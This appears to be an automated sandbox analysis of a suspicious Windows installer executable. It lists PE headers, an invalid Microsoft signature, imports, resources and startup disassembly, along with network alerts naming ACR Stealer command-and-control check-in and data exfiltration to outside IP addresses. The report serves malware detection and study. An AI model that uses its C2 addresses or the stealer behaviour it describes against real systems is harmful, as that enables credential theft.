                                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                                                                    Import Hash:8507116e3d0e7e02e36e7dc5b8aa1af8
                                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                                    Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                    Error Number:-2146869232
Not Before:15/12/2020 21:24:20
Not After:02/12/2021 21:24:20
Subject Chain:CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                                    Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                                                                                                                                    Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                                                                                                                                    Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                                                                                                                                    Serial:33000003DFFB6AE3F427ECB6A30000000003DF
                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                                    add esp, FFFFFFF0h
                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                    mov eax, 006BA0FCh
                                                                                                                                                                                                                                                    call 00007F239C5BFA7Ah
                                                                                                                                                                                                                                                    mov eax, dword ptr [006CEEC4h]
                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                    mov eax, dword ptr [eax+00000188h]
                                                                                                                                                                                                                                                    push FFFFFFECh
                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                    call 00007F239C5C3E15h
                                                                                                                                                                                                                                                    mov edx, dword ptr [006CEEC4h]
                                                                                                                                                                                                                                                    mov edx, dword ptr [edx]
                                                                                                                                                                                                                                                    mov edx, dword ptr [edx+00000188h]
                                                                                                                                                                                                                                                    and eax, FFFFFF7Fh
                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                    push FFFFFFECh
                                                                                                                                                                                                                                                    push edx
                                                                                                                                                                                                                                                    call 00007F239C5C3E01h
                                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                    push 006C56F1h
                                                                                                                                                                                                                                                    push dword ptr fs:[eax]
                                                                                                                                                                                                                                                    mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                                    push 00000001h
call 00007F239C5C315Ch
call 00007F239C868CEBh
mov eax, dword ptr [006B9D24h]
push eax
push 006B9DBCh
mov eax, dword ptr [006CEEC4h]
mov eax, dword ptr [eax]
call 00007F239C7675C8h
mov eax, 006B499Ch
mov edx, dword ptr [006CED3Ch]
mov dword ptr [edx], eax
call 00007F239C868D32h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007F239C87455Bh
jmp 00007F239C5B837Fh
call 00007F239C868A7Ah
mov eax, 00000001h
call 00007F239C5B8E68h
call 00007F239C5B87C3h
mov eax, dword ptr [006CEEC4h]
mov eax, dword ptr [eax]
mov edx, 006C5884h
call 00007F239C767092h
push 00000005h
mov eax, dword ptr [006CEEC4h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000188h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2dd000 | 0x97 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2d8000 | 0x39ba | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2e0000 | 0xdda00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x48fd03f | 0x21d0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2df000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2d89f0 | 0x8c4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x2dc000 | 0xbde | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2c1610 | 0x2c1800 | dae0b06841f0c93b7de0b99e55fb3be3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x2c3000 | 0x2890 | 0x2a00 | 16393e4e7bec78a4bcae5ae55f8f292c | False | 0.5015811011904762 | data | 6.1019414475775875 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x2c6000 | 0x91e0 | 0x9200 | 042a801fd25918b12ad83daff139f4d4 | False | 0.5827536386986302 | data | 6.263961718314003 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x2d0000 | 0x7900 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2d8000 | 0x39ba | 0x3a00 | 03081ba482d19e9b1cd93a470ca85644 | False | 0.3356007543103448 | data | 5.288947298357307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x2dc000 | 0xbde | 0xc00 | c332bb295f400e296d2b360ecd996bd0 | False | 0.3502604166666667 | data | 4.388049073777676 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x2dd000 | 0x97 | 0x200 | c2fbf23dade9282f5d6f41b22deec17c | False | 0.25 | data | 1.851215117761671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x2de000 | 0x4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2df000 | 0x5d | 0x200 | b334cafcb8aaba886c7aff7f26845b05 | False | 0.189453125 | data | 1.3626936858228273 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2e0000 | 0xdda00 | 0xdda00 | 88b5e0fc2fdb080a46f261ffd6c35a4a | False | 0.558020921460801 | data | 7.336237770749843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x2e10b0 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x2e11e4 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x2e1318 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x2e144c | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x2e1580 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x2e16b4 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x2e17e8 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_ICON | 0x2e191c | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.04227680680207841
RT_ICON | 0x2e5b44 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.07157676348547717
RT_ICON | 0x2e80ec | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.08794559099437148
RT_ICON | 0x2e9194 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.11891828058573453
RT_ICON | 0x2ed3bc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.1578838174273859
RT_ICON | 0x2ef964 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.010333018422295701
RT_ICON | 0x2f3b8c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.026763485477178422
RT_ICON | 0x2f6134 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.02626641651031895
RT_ICON | 0x2f71dc | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.15806754221388367
RT_ICON | 0x2f8284 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27172131147540984
RT_ICON | 0x2f8c0c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.350177304964539
RT_ICON | 0x2f9074 | 0x3732 | PNG image data, 256 x 256, 8-bit colormap, non-interlaced | English | United States | 0.9632696390658174
RT_ICON | 0x2fc7a8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.5783582089552238
RT_ICON | 0x2fd650 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.6678700361010831
RT_ICON | 0x2fdef8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 672 | English | United States | 0.6716589861751152
RT_ICON | 0x2fe5c0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4667630057803468
RT_ICON | 0x2feb28 | 0xb96b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9835464638591022
RT_ICON | 0x30a494 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6
RT_ICON | 0x30ca3c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6887898686679175
RT_ICON | 0x30dae4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5491803278688525
RT_ICON | 0x30e46c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3537234042553192
RT_STRING | 0x30e8d4 | 0x210 | data | | | 0.3125
RT_STRING | 0x30eae4 | 0x440 | data | | | 0.37683823529411764
RT_STRING | 0x30ef24 | 0x2b4 | data | | | 0.45809248554913296
RT_STRING | 0x30f1d8 | 0x214 | data | | | 0.4605263157894737
RT_STRING | 0x30f3ec | 0x3e4 | data | | | 0.3885542168674699
RT_STRING | 0x30f7d0 | 0x3a0 | data | | | 0.4191810344827586
RT_STRING | 0x30fb70 | 0x1ec | data | | | 0.5609756097560976
RT_STRING | 0x30fd5c | 0xcc | data | | | 0.6666666666666666
RT_STRING | 0x30fe28 | 0x294 | data | | | 0.4681818181818182
RT_STRING | 0x3100bc | 0x3e8 | data | | | 0.372
RT_STRING | 0x3104a4 | 0x488 | data | | | 0.41293103448275864
RT_STRING | 0x31092c | 0x418 | data | | | 0.28435114503816794
RT_STRING | 0x310d44 | 0x370 | data | | | 0.4147727272727273
RT_STRING | 0x3110b4 | 0x39c | data | | | 0.41233766233766234
RT_STRING | 0x311450 | 0x4a4 | data | | | 0.382996632996633
RT_STRING | 0x3118f4 | 0x384 | data | | | 0.37333333333333335
RT_STRING | 0x311c78 | 0x454 | data | | | 0.3935018050541516
RT_STRING | 0x3120cc | 0x210 | data | | | 0.39015151515151514
RT_STRING | 0x3122dc | 0xbc | data | | | 0.6542553191489362
RT_STRING | 0x312398 | 0x100 | data | | | 0.62890625
RT_STRING | 0x312498 | 0x338 | data | | | 0.4223300970873786
RT_STRING | 0x3127d0 | 0x3f0 | data | | | 0.34226190476190477
RT_STRING | 0x312bc0 | 0x314 | data | | | 0.38578680203045684
RT_STRING | 0x312ed4 | 0x2f8 | data | | | 0.38026315789473686
RT_RCDATA | 0x3131cc | 0x10 | data | | | 1.5
RT_RCDATA | 0x3131dc | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
RT_RCDATA | 0x3149dc | 0xb70 | data | | | 0.5358606557377049
RT_RCDATA | 0x31554c | 0x147 | Delphi compiled form 'TMainForm' | | | 0.746177370030581
RT_RCDATA | 0x315694 | 0x480 | Delphi compiled form 'TNewDiskForm' | | | 0.5052083333333334
RT_RCDATA | 0x315b14 | 0x400 | Delphi compiled form 'TSelectFolderForm' | | | 0.5087890625
                                                                                                                                                                                                                                                    RT_RCDATA0x315f140x4b5Delphi compiled form 'TSelectLanguageForm'0.5004149377593361
                                                                                                                                                                                                                                                    RT_RCDATA0x3163cc0x7e3Delphi compiled form 'TUninstallProgressForm'0.40713224368499257
                                                                                                                                                                                                                                                    RT_RCDATA0x316bb00x55cDelphi compiled form 'TUninstSharedFileForm'0.41690962099125367
                                                                                                                                                                                                                                                    RT_RCDATA0x31710c0x2ac9Delphi compiled form 'TWizardForm'0.19811923673879303
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319bd80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319bec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_CURSOR0x319c500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319c640x92dataEnglishUnited States0.6643835616438356
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319cf80x30dataEnglishUnited States0.9375
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319d280x22dataEnglishUnited States1.0588235294117647
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319d4c0x30dataEnglishUnited States0.9375
                                                                                                                                                                                                                                                    RT_GROUP_ICON0x319d7c0x30dataEnglishUnited States0.9583333333333334
                                                                                                                                                                                                                                                    RT_VERSION0x319dac0x514dataEnglishUnited States0.30846153846153845
                                                                                                                                                                                                                                                    RT_MANIFEST0x31a2c00x765XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39091389329107235
DLL | Import
mpr.dll | WNetEnumResourceW, WNetGetUniversalNameW, WNetGetConnectionW, WNetCloseEnum, WNetOpenEnumW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
comctl32.dll | FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, FlatSB_GetScrollInfo, ImageList_Write, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_Draw, ImageList_Remove
shell32.dll | SHBrowseForFolderW, SHGetMalloc, SHGetFileInfoW, SHChangeNotify, Shell_NotifyIconW, ShellExecuteW, SHGetPathFromIDListW, ShellExecuteExW
user32.dll | CopyImage, CreateWindowExW, GetMenuItemInfoW, SetMenuItemInfoW, DefFrameProcW, GetDCEx, GetMessageW, PeekMessageW, MonitorFromWindow, GetDlgCtrlID, ScrollWindowEx, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, FrameRect, MapVirtualKeyW, OffsetRect, IsWindowUnicode, RegisterWindowMessageW, FillRect, GetMenuStringW, DispatchMessageW, SendMessageA, DefMDIChildProcW, EnumWindows, GetClassInfoW, GetSystemMenu, WaitForInputIdle, ShowOwnedPopups, GetScrollRange, GetScrollPos, SetScrollPos, GetActiveWindow, SetActiveWindow, DrawEdge, InflateRect, GetKeyboardLayoutList, OemToCharBuffA, LoadBitmapW, DrawFocusRect, EnumChildWindows, GetScrollBarInfo, SendNotifyMessageW, ReleaseCapture, UnhookWindowsHookEx, LoadCursorW, GetCapture, SetCapture, CreatePopupMenu, ScrollWindow, ShowCaret, GetMenuItemID, GetLastActivePopup, CharLowerBuffW, GetSystemMetrics, SetWindowLongW, PostMessageW, DrawMenuBar, SetParent, IsZoomed, CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, LoadImageW, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll | SafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
advapi32.dll | RegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
msvcrt.dll | memcpy
winhttp.dll | WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
kernel32.dll | SetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
ole32.dll | StgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
gdi32.dll | Arc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries
Name | Ordinal | Address
TMethodImplementationIntercept | 3 | 0x4b5e78
__dbk_fcall_wrapper | 2 | 0x410a7c
dbkFCallWrapperAddr | 1 | 0x6d3640
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-27T21:27:36.583256+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49732 | 104.121.10.34 | 443 | TCP
2024-12-27T21:27:38.720224+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49734 | 104.21.2.114 | 443 | TCP
2024-12-27T21:27:38.720224+0100 | 2052674 | ET MALWARE ACR Stealer CnC Checkin Attempt | 1 | 192.168.2.4 | 49734 | 104.21.2.114 | 443 | TCP
2024-12-27T21:27:40.836719+0100 | 2052675 | ET MALWARE ACR Stealer Data Exfiltration Attempt M1 | 1 | 192.168.2.4 | 49736 | 104.21.2.114 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.713074923 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.713088036 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.713114977 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.713190079 CET49732443192.168.2.4104.121.10.34
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.713207006 CET44349732104.121.10.34192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.897526026 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.897615910 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.897689104 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.897921085 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:36.897953987 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.110199928 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.110312939 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.122952938 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.123003960 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.123207092 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.123292923 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.123677015 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.167360067 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720237970 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720273972 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720303059 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720328093 CET44349734104.21.2.114192.168.2.4
